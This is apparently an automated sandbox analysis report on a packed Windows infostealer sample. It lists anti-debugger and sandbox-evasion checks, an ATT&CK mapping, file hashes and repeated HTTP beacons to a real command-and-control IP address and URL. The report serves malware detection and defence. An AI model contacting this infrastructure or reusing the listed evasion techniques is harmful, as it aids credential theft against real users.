Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00704171 rdtsc | 0_2_00704171
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, | 0_2_00402A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_047A7D41 push dword ptr fs:[00000030h] | 0_2_047A7D41
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04950D90 mov eax, dword ptr fs:[00000030h] | 0_2_04950D90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495092B mov eax, dword ptr fs:[00000030h] | 0_2_0495092B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00418592 GetProcessHeap, | 0_2_00418592
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_00409A2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0040A58A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A720 SetUnhandledExceptionFilter, | 0_2_0040A720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04959C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_04959C91
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0495A7F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0495D04A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495A987 SetUnhandledExceptionFilter, | 0_2_0495A987
Source: file.exe, file.exe, 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: jProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A2EC cpuid | 0_2_0040A2EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, | 0_2_00410822

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1418979529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
ATT&CK matrix, listed per tactic. The number in parentheses after a technique is the count of behavioral signatures matched to it; techniques without a number are the matrix's placeholders with no match.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Command and Scripting Interpreter (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (351); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1); Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Security Software Discovery (771); Virtualization/Sandbox Evasion (351); Process Discovery (3); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (213)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label
file.exe | 37% | ReversingLabs | Win32.Infostealer.Tinba
file.exe | 47% | Virustotal |
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubY | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub9 | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubI | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub) | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubXy | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubion | 100% | Avira URL Cloud | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk | file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub) | file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub9 | file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubI | file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubY | file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubi | file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosuby | file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubXy | file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubion | file.exe, 00000000.00000002.3841763949.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.156.72.65 | unknown | Russian Federation | | 44636 | ITDELUXE-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565625
Start date and time: 2024-11-30 10:40:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
04:41:30 | API Interceptor | 13609979x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.156.72.65 | file.exe | Get hash | malicious | Amadey, Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
| file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
| file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | Browse | 185.156.72.65/soft/download
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/soft/download
| file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.156.72.65/files/download
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/soft/download
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/soft/download
| file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig | Browse | 185.156.72.65/files/download
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/soft/download
                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ITDELUXE-ASRU | file.exe | Get hash | malicious | Amadey, Nymaim | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
| file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | Browse | 185.156.72.65
                      No context
                      No context
                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947478197450379
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'027'520 bytes
MD5: ac44247e8835b336845ad56b84583656
SHA1: ff499dadf0fd0f90d3e156ba2d521367678be35e
SHA256: e1a6fe984f3ffc681defb85678e20fb0fa1c4afe1a8e99dc974dc3253a04b371
SHA512: 0a9476d193084f2232301734cb558b2e5bf56e59d73c2e6f418c51c0592e4b350e19855c3b4a7ca95c19fe071baf3ff097ee0b68077d9976f68600a0266f15d5
SSDEEP: 49152:5t438z9pPZvbvzYHVD6z3kKipcwaYES6Zd6+u9rKHgYewg8SP:5t438zRbvQVD6gKiv5oWrAg3wTS
TLSH: 7B9533263DE1DB3FC86AC1F89076E8E638917B90A5D392DD8518A735C53B18DBFE4021
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.
Icon Hash: cfa99b8a8651798d
Entrypoint: 0x8bf000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007F6C54E190DAh
                      Programming Language:
                      • [C++] VS2008 build 21022
                      • [ASM] VS2008 build 21022
                      • [ C ] VS2008 build 21022
                      • [IMP] VS2005 build 50727
                      • [RES] VS2008 build 21022
                      • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f05b | 0x6f | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x8234 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4ba59c | 0x18 | goeehmfk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(special chars) | 0x1000 | 0x65000 | 0x3ae00 | 952cdc556f7d72f0a693044663ae0cea | False | 0.9941779458598726 | data | 7.933164122793504 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x66000 | 0x8234 | 0x3c00 | 1254adb667fecde1c39b82eed9a3eee2 | False | 0.9261067708333334 | data | 7.706464215665289 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6f000 | 0x1000 | 0x200 | 6eb091ff88873fe4d3f846082d82dda4 | False | 0.154296875 | data | 1.0965193819233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(special chars) | 0x70000 | 0x2a1000 | 0x200 | 020bbad67020c29a915f162c78150562 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
goeehmfk | 0x311000 | 0x1ad000 | 0x1acc00 | e82572f730030f10a9c78c3c3727c60d | False | 0.9919665634110787 | data | 7.950296707556539 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ukgkvxbu | 0x4be000 | 0x1000 | 0x400 | c68b030b1b8e96c828e18e7377c6b7fe | False | 0.7138671875 | data | 5.743618334242075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4bf000 | 0x3000 | 0x2200 | 7b44e3663a580563880f19b13e39f761 | False | 0.07088694852941177 | DOS executable (COM) | 0.7854414732277604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x66460 | 0xea8 | data | | | 1.0029317697228144
RT_CURSOR | 0x67308 | 0x8a8 | data | | | 1.0049638989169676
RT_CURSOR | 0x67bb0 | 0x568 | data | | | 1.0079479768786128
RT_CURSOR | 0x68118 | 0xea8 | data | | | 1.0029317697228144
RT_CURSOR | 0x68fc0 | 0x8a8 | data | | | 1.0049638989169676
RT_CURSOR | 0x69868 | 0x568 | data | | | 0.5195652173913043
RT_ICON | 0x4ba5fc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7557603686635944
RT_ICON | 0x4ba5fc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7557603686635944
RT_ICON | 0x4bacc4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.6829875518672199
RT_ICON | 0x4bacc4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.6829875518672199
RT_ICON | 0x4bd26c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8058510638297872
RT_ICON | 0x4bd26c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8058510638297872
RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | India | 0
RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | India | 0
RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d494 | 0x520 | empty | Tamil | India | 0
RT_STRING | 0x6d494 | 0x520 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | India | 0
RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | Sri Lanka | 0
RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | India | 0
RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | Sri Lanka | 0
RT_GROUP_CURSOR | 0x6ddfc | 0x30 | empty | | | 0
RT_GROUP_CURSOR | 0x6de2c | 0x30 | empty | | | 0
RT_GROUP_ICON | 0x4bd6d4 | 0x30 | data | Tamil | India | 0.9375
RT_GROUP_ICON | 0x4bd6d4 | 0x30 | data | Tamil | Sri Lanka | 0.9375
RT_VERSION | 0x4bd704 | 0x254 | data | | | 0.5436241610738255
RT_MANIFEST | 0x4bd958 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Language of compilation system | Country where language is spoken | Map
Tamil | India |
Tamil | Sri Lanka |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2024 10:41:04.697727919 CET | 49706 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:04.818434954 CET | 80 | 49706 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:04.818532944 CET | 49706 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:04.933504105 CET | 49706 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:05.054162979 CET | 80 | 49706 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:26.791609049 CET | 80 | 49706 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:26.791690111 CET | 49706 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:26.792613029 CET | 49706 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:26.912496090 CET | 80 | 49706 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:29.807033062 CET | 49709 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:29.926903963 CET | 80 | 49709 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:29.927103043 CET | 49709 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:29.927345991 CET | 49709 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:30.047246933 CET | 80 | 49709 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:51.901607990 CET | 80 | 49709 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:51.903636932 CET | 49709 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:51.903724909 CET | 49709 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:52.023605108 CET | 80 | 49709 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:54.920896053 CET | 49710 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:55.041376114 CET | 80 | 49710 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:41:55.041493893 CET | 49710 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:55.041784048 CET | 49710 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:41:55.161706924 CET | 80 | 49710 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:03.046163082 CET | 49710 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:06.116095066 CET | 49712 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:06.236047029 CET | 80 | 49712 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:06.236123085 CET | 49712 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:06.236412048 CET | 49712 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:06.356324911 CET | 80 | 49712 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:28.204852104 CET | 80 | 49712 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:28.208702087 CET | 49712 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:28.208900928 CET | 49712 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:28.328840017 CET | 80 | 49712 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:31.221074104 CET | 49713 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:31.341521978 CET | 80 | 49713 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:31.341701984 CET | 49713 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:31.342145920 CET | 49713 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:31.462126970 CET | 80 | 49713 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:53.252943039 CET | 80 | 49713 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:53.254585981 CET | 49713 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:53.254791975 CET | 49713 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:53.374794960 CET | 80 | 49713 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:56.268115997 CET | 49714 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:56.388317108 CET | 80 | 49714 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:42:56.388396025 CET | 49714 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:56.388696909 CET | 49714 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:42:56.508598089 CET | 80 | 49714 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:43:18.316778898 CET | 80 | 49714 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:43:18.316898108 CET | 49714 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:18.317059994 CET | 49714 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:18.437243938 CET | 80 | 49714 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:43:21.332757950 CET | 49715 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:21.453342915 CET | 80 | 49715 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:43:21.457009077 CET | 49715 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:21.457329988 CET | 49715 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:21.577872038 CET | 80 | 49715 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:43:43.466233969 CET | 80 | 49715 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:43:43.466528893 CET | 49715 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:43.466727972 CET | 49715 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:43.586699963 CET | 80 | 49715 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:43:46.479862928 CET | 49716 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:46.600039959 CET | 80 | 49716 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:43:46.600130081 CET | 49716 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:46.600469112 CET | 49716 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:43:46.720396042 CET | 80 | 49716 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:08.519996881 CET | 80 | 49716 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:08.520061016 CET | 49716 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:08.520251036 CET | 49716 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:08.640192032 CET | 80 | 49716 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:11.532877922 CET | 49717 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:11.653013945 CET | 80 | 49717 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:11.653280973 CET | 49717 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:11.653470039 CET | 49717 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:11.773377895 CET | 80 | 49717 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:33.599519014 CET | 80 | 49717 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:33.601002932 CET | 49717 | 80 | 192.168.2.8 | 185.156.72.65
